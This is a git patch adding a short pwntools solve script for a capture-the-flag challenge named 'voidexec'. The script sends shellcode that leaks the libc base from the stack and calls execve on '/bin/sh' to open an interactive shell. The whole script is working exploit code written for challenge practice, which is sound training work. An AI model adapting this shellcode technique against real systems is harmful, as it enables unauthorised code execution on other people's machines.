From af72710a3563e6da3ce7e979fd6ddbe2bc7df9c6 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Fri, 21 Mar 2025 08:10:23 +0300
Subject: [PATCH] solve script

---
 random_challs/voidexec/a.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 random_challs/voidexec/a.py

diff --git a/random_challs/voidexec/a.py b/random_challs/voidexec/a.py
new file mode 100644
index 0000000..0264e0f
--- /dev/null
+++ b/random_challs/voidexec/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./voidexec", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = f"""
+xor rsi, rsi
+xor rdx, rdx
+mov r9, [rsp+32]
+sub r9, {libc.sym.__libc_start_call_main+128}
+mov rdi, r9
+add rdi, {next(libc.search(b"/bin/sh\0"))}
+mov r15, r9
+add r15, {libc.sym.execve}
+call r15
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()
\ No newline at end of file